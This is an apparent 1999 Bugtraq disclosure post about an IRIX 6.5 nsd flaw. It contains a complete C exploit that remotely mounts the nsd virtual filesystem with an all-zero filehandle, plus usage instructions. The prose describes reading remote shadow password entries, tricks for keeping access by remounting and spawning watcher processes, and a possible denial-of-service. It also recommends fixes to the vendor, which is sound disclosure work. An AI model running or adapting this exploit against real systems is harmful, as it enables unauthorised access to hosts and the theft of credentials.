From: Jefferson Ogata (JO317) [ogata@POBOX.COM]
Sent: Monday, May 31, 1999 3:57 AM
To: BUGTRAQ@NETSPACE.ORG
Subject: IRIX 6.5 nsd virtual filesystem vulnerability

I've been waiting since February for SGI to post an advisory about this.
Enough.

/******************************************************************************

IRIX 6.5 nsd virtual filesystem exploit

Author: Jefferson Ogata (JO317) <ogata@pobox.com>

Please note that this program comes with NO WARRANTY WHATSOEVER. Your use
of this program constitutes your complete acceptance of all liability for
any damage or loss caused by the aforesaid use. It is provided to the
network community solely to document the existence of a vulnerability
in the security implementations of certain versions of IRIX, and may not
be used for any illicit purpose. Many of the details of the bug this
program exploits have been available to users of SGI's online support
system since February 1999. The current revision of IRIX (6.5.3) corrects
this bug, at least enough to stop this particular exploit, and I strongly
encourage you to bring your systems up to date as quickly as possible.

With IRIX 6.5, SGI has moved all name services, NIS services, and DNS
lookups into a userland process called nsd, which exports the results of
the queries it fields into a virtual filesystem. The virtual filesystem is
normally mounted onto the directory /ns by the program /sbin/nsmount, which
is invoked by nsd on startup. The nsd daemon itself is exporting the
filesystem via NFS3 over a dynamically bound UDP port -- rather than a
well-known or settable one -- typically in the 1024-1029 range. On a
desktop system, 1024 is a good bet, since nsd is usually the first
RPC/UDP service to be started.

The NFS filesystem is not registered with mountd, so there is no way to
query mountd for a mount filehandle. But because the NFS port is fairly
easy to discover through port scanning, and because the mount filehandle
nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd
filesystem from a host anywhere on the Internet. nsd will serve an array
of NFS requests to anyone. Furthermore, because the service's NFS port is
bound dynamically, it is difficult to protect it with a firewall; it may
change from one system start to another, or if the daemon is killed and
restarted.

This program can successfully mount the nsd-exported virtual filesystem
from a remote host onto a machine running IRIX 6.4 or higher. It makes use
of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know
what this flag does at the NFS protocol level, but it allows the client to
ask the NFS server not to enforce certain permissions controls against the
client. I don't know whether any other vendor NFS client systems support
this flag. A clever person might write a userland NFS client that would
accept an initial handle, NFS port, etc. as arguments.

On an SGI with SGI C compiler, compile with:

    cc -o nsdadv nsdadv.c

Run it this way:

    nsdadv /mnt sucker.example.com 1024

with obvious substitutions.

So what are the security implications of this? Well, at the very least, the
nsd filesystem on an NIS server reveals the NIS domain name, and what maps
it contains, as well as what classes are being used.

By exploring the filesystem shortly after it has been mounted I have been
able to retrieve data that should be hidden from me, including shadow
password entries from a remote system's shadow file.

Beyond retrieving keys and maps, you can also monitor the filesystem for
changes. A great deal of information is leaked through the contents of the
nsd filesystem. For example, if host A looks up a host B's IP address, a
file named B will appear in the /.local/hosts.byname directory in A's nsd
filesystem. The file's contents will be the IP address.

By the way, though you be unable to chdir into a particular location in
the nsd filesystem, you may yet succeed under slightly different
conditions. Eventually you can do it. I'm not sure why or when, but nsd
gets picky sometimes. Eventually it relents. Specifically, I've found that
the entire nsd filesystem appears readable for a few seconds after it is
initially mounted. If you can't look at something, unmount the filesystem,
remount it, and try again immediately. It also seems that a stat() is
sometimes required before a chdir(). Your mileage may vary, but keep
trying. You may wish to write a script to mount the nsd filesystem, explore
and take inventory of its contents, and unmount the filesystem quickly.

Once you've chdir'd into a directory, it appears you can always read it,
although you can't necessarily stat its contents. This suggests a strategy
of spawning a group of processes each with its cwd set to a subdirectory of
the nsd filesystem, in order to retain visibility on the entire filesystem.
Each process would generate an inventory of its cwd, and then monitor it
for changes. A Perl script could do this well.

Another thing: it is possible to create an empty file in nsd's exported
filesystem simply by stat()ing a nonexistent filename. This suggests a
potential DoS by creating many files in a directory.

Remember that the system keeps a local cache in /var/ns, so you may have
to wait for cached entries on the target host to expire before you'll see
them reappear in the virtual filesystem.

For some fairly extensive info on the nsd implementation, take a look at:

    http://www.bitmover.com/lm/lamed_arch.html

******

What got me into all this was that I found I could no longer run services
chrooted if they required DNS. It took considerable effort to come up with
a solution to this. This was a fundamental change from IRIX 6.4, and I know
I'm not the only one who finds the nsd implementation to be a generally
unpleasant direction, in part because it causes umount -t nfs to break
system database services. I give SGI points for creativity -- in one sense,
using NFS as a database access system is a very slick approach. But the
database needs a security model, and the model needs to be implemented
correctly. Neither of these needs appears to have been met.

So how could SGI fix this?

Without going back, SGI could at least make nsd respond only to queries
from localhost (see note below about IRIX 6.5.3). The problem here is that
they actually intend to support remote mounts in later releases, in order
to supplement or supplant other means of distribution. The web documents
indicate this.

They could create a well-randomized mount filehandle for the filesystem
and pass that to nsmount. Then you couldn't remotely mount the filesystem
without guessing the handle -- nontrivial with a 32-byte handle.

At the very least, they should provide libraries of regular BIND resolver
routines, file-based getpwent, etc. routines, so one could choose the
resolution strategy at link time, perhaps by modifying the shared library
path.

******

With IRIX release 6.5.3, SGI appears to have fixed this problem, at least
to some degree. The exploit does not appear to work as it does against
6.5.2. Further testing is needed, and the behavior should be watched
carefully in future versions of IRIX.

******************************************************************************/

#include <stdio.h>
#include <string.h>
#include <malloc.h>
#include <mntent.h>
#include <sys/types.h>
#include <rpc/types.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/mount.h>
#include <sys/fs/nfs.h>
#include <sys/fs/nfs_clnt.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

/* Filesystem type name for nsd-exported filesystem. */
#define NSD_FSTYPE      "nfs3"

/* File the records mounted filesystems. */
#define MTAB_FILE       "/etc/mtab"

/* Socket address we'll fill in with our destination IP and port. */
struct sockaddr_in sin;

/* All zero file handle. This appears to be the base handle for the nsd
   filesystem. Great security, huh? */
unsigned char fh[NFS_FHSIZE] = { 0 };

/* NFS mount options structure to pass to mount(2). The meanings of these
   are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The
   flags field indicates that this is a soft mount without log messages,
   and to set the initial timeout and number of retries from fields in
   this structure. The fh field is a pointer to the filehandle of the
   mount point, whose size is set by fh_len. As noted above, the mount
   point filehandle is just 32 zeroes. */
struct nfs_args nx =
{
    &sin,               /* addr */
    (fhandle_t *) fh,   /* fh */
    NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC,        /* flags */
    0,                  /* wsize */
    0,                  /* rsize */
    100,                /* timeo */
    2,                  /* retrans */
    0,                  /* hostname */
    0,                  /* acregmin */
    0,                  /* acregmax */
    0,                  /* acdirmin */
    0,                  /* acdirmax */
    0,                  /* symttl */

    { 0 },              /* base */

    0,                  /* namemax */
    NFS_FHSIZE,         /* fh_len */
    /* On IRIX 6.4 and up there are also the following... */
                        /* bdsauto */
                        /* bdswindow */
    /* On IRIX 6.5 there are also the following... */
                        /* bdsbuflen */
                        /* pid */
                        /* maxthreads */
};

void usage (void)
{
    fprintf (stderr, "usage: nsmount_remote directory host port\n\n");
    fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on <host> via NSD daemon\n");
    fprintf (stderr, "port <port> onto <directory>.\n\n");
    exit (1);
}

int main (int argc, char **argv)
{
    char                *dir;
    char                *host;
    char                *ports;
    int                 port;
    struct hostent      *h;
    int                 fstype;
    FILE                *mtabf;
    struct mntent       mnt =
    {
        0,
        0,
        NSD_FSTYPE,
        "soft,timeo=100,retrans=2",
        0,
        0,
    };

    if (argc != 4)
        usage ();

    dir = argv[1];
    host = argv[2];
    port = atoi ((ports = argv[3]));

    /* Prepare for host lookup. */
    memset ((void *) &sin, 0, sizeof (sin));
    sin.sin_family = 2;
    sin.sin_port = port;

    /* Look up the host. */
    if (inet_aton (host, &sin.sin_addr))
        ;
    else if ((h = gethostbyname (host)))
    {
        unsigned long   *l = (unsigned long *) *(h->h_addr_list);
        sin.sin_addr.s_addr = l[0];
    }
    else
    {
        fprintf (stderr, "Cannot resolve host %s.\n", host);
        return 1;
    }

    /* Get filesystem type index for nsd filesystem type. */
    if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
    {
        perror ("sysfs (" NSD_FSTYPE ")");
        return 1;
    }

    fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
        host, inet_ntoa (sin.sin_addr), port, dir);

    /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
       means "tell server to trust us with attributes" and MS_DATA means
       "6-argument mount".

       MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
       seem to work without this option. So even though this program will
       compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
       attack nsd. */
    if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx))
        != 0)
    {
        perror ("mount");
        return 1;
    }

    /* Record mount point in /etc/mtab. */
    mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
    sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
    mnt.mnt_dir = dir;
    if (!(mtabf = setmntent (MTAB_FILE, "r+")))
    {
        perror ("setmntent");
        return 1;
    }
    if (addmntent (mtabf, &mnt) < 0)
    {
        perror ("addmntent");
        return 1;
    }
    if (endmntent (mtabf) < 0)
    {
        perror ("endmntent");
        return 1;
    }

    return 0;
}